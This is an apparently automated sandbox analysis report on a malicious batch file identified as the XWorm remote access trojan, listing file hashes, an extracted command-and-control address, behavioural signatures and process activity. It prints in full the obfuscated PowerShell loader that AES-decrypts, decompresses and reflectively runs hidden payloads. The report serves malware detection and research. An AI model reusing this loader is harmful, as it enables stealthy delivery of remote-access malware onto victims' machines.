Analysis
-
max time kernel
438s -
max time network
1161s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-11-2024 17:27
Static task
static1
General
-
Target
ssssss.bat
-
Size
293KB
-
MD5
55045f48b34f00088c49b229bc07c30e
-
SHA1
f875cce5c12e06899b39223e040cad9f46ada1cd
-
SHA256
ad7c1c54dbc4a02faa20044c37c24478923ca1cc17989429caf059cc622eb95e
-
SHA512
549512c75fc5089cb7d4b41e3b55dde60ae253232f4ea7aed25296ebe6f16e6cc5d9fac8284240d23e060a6770514473eb29a81d5a6041ea43bf6d28f163ee7d
-
SSDEEP
3072:YIeH8waTPggAXw95luaeejSSb6wM7wXgfYM8J2Q3nfWvSYD5y6wHh9+nxMKi1/TM:gHbWAXnevGR6f2QvFIyD9+K/TvXum6
Malware Config
Extracted
xworm
149.40.62.55:60447
-
Install_directory
%AppData%
-
install_file
System User.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4564-15-0x000001ACF49E0000-0x000001ACF49F8000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 4564 powershell.exe -
pid Process 4564 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4564 powershell.exe 4564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4564 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4456 wrote to memory of 4564 4456 cmd.exe 81 PID 4456 wrote to memory of 4564 4456 cmd.exe 81
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ssssss.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nm1BOIVwFMg62nJj+FT46gafirK1QerzAciTsV/QolM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jX3hxWDIqv2IN+tBy0WraA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHbKp=New-Object System.IO.MemoryStream(,$param_var); $WQnGV=New-Object System.IO.MemoryStream; $ghfCO=New-Object System.IO.Compression.GZipStream($eHbKp, [IO.Compression.CompressionMode]::Decompress); $ghfCO.CopyTo($WQnGV); $ghfCO.Dispose(); $eHbKp.Dispose(); $WQnGV.Dispose(); $WQnGV.ToArray();}function execute_function($param_var,$param2_var){ $yhsic=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GuzyD=$yhsic.EntryPoint; $GuzyD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ssssss.bat';$KwMeq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ssssss.bat').Split([Environment]::NewLine);foreach ($hxuMo in $KwMeq) { if ($hxuMo.StartsWith(':: ')) { $ZEAAE=$hxuMo.Substring(3); break; }}$payloads_var=[string[]]$ZEAAE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82